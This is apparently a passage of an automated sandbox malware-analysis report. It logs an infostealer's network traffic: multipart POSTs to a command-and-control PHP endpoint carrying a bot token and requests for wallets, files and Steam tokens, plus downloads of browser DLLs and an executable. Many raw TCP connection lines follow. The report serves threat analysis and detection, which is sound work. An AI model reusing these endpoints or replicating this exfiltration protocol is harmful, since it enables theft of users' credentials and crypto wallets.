                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file"------CGHCGIIDGDAKFIEBKFCF--
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECGHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"wallets------FCAFIJJJKEGIECAKKEHI--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCBHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"files------GHCGDAFCFHIDBGDHCFCB--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJDGIEBKKFHJKJKEGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBFHJJDAAKFIECGDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 52 45 39 44 55 31 78 49 56 45 46 48 56 6b 52 47 56 55 6c 46 58 45 68 55 51 55 64 57 52 45 5a 56 53 55 55 75 5a 47 39 6a 65 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 53 46 52 42 52 31 5a 45 52 6c 56 4a 52 55 78 48 57 6b 5a 44 56 46 70 61 52 31 4a 54 55 55 6c 54 51 31 68 4e 54 30 74 54 51 30 46 61 52 55 70 57 51 56 42 43 55 45 70 4c 51 55 4a 4a 57 6b 74 46 52 30 5a 42 52 30 31 48 54 30 6c 56 55 45 68 51 53 6b 39 5a 53 56 64 4e 56 6b 6c 4c 56 30 4e 4f 56 55 39 58 52 45 31 48 51 30 5a 59 53 6c 46 42 54 6b 31 4e 54 31 56 4d 53 56 5a 55 55 56 46 48 56 56 70 57 56 6b 39 4d 57 6c 64 43 57 56 52 49 57 55 39 49 54 55 31 57 53 55 31 55 56 45 4a 43 51 30 46 4a 52 30 39 4f 54 6c 4a 57 52 56 56 4e 56 45 4e 55 51 30 56 4e 56 46 64 47 54 6b 52 54 55 56 42 49 52 56 42 4d 51 55 5a 61 51 55 74 5a 55 31 4a 50 57 6b 74 53 55 55 52 56 57 6b 39 56 57 6b 6c 4c 53 6b 64 4b 55 6b 6c 43 53 6b 39 45 53 45 39 56 54 45 70 49 56 31 46 43 53 55 70 54 51 55 6c 5a 54 56 68 4d 52 6b 39 54 52 6b 39 46 52 6b 74 55 55 56 42 46 52 56 64 47 56 45 5a 44 53 55 5a 54 54 45 68 59 55 31 68 5a 57 45 4a 58 56 46 42 44 56 30 31 44 52 31 42 46 56 45 39 54 56 6b 78 4f 53 31 6c 44 54 30 35 47 56 30 4e 4a 56 55 5a 46 55 55 74 50 56 31 46 4f 55 55 74 4b 55 30 6c 61 53 30 35 61 57 45 39 52 56 30 31 55 53 6b 39 48 56 30 52 43 56 55 5a 43 53 30 52 59 56 56 42 5a 57 55 6c 59 56 56 52 50 55 46 4e 50 56 6c 64 4d 56 6b 74 4a 54 30 74 47 55 46 4e 59 52 45 46 57 54 55 4a 56 57 6b 6c 5a 57 56 70 56 55 56 52 45 54 46 70 4a 54 56 4a 53 52 31 68 4d 56 45 39 46 53 6b 31 47 56 30 78 50 54 55 35 51 54 6b 78 4a 51 31 42 61 55 45 74 55 53 46 42 59 52 55 78 48 51 6c 6c 55 53 6b 78 50 53 6b 39 46 56 30 35 53 52 45 35 4e 57 46 68 53 57 55 31 42 53 6b 4a 58 51 31 52 4f 54 55 4a 53 52 55 6c 4b 52 46 5a 57 53 56 68 46 53 45 56 48 57 56 46 4c 57 6c 46 44 52 30 78 57 53 45 39 44 54 56 56 54 53 31 68 44 55 56 46 4e 56 56 4a
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 2d 2d 0d 0a Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file"------HCFBFBAEBKJKEBGCAEHC--
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 185.172.128.76Content-Length: 84915Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKFHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="message"her7h48r------JEGDGIIJJECFIDHJJKKF--
                              Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                              Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                              Source: Joe Sandbox ViewIP Address: 185.172.128.228 185.172.128.228
                              Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
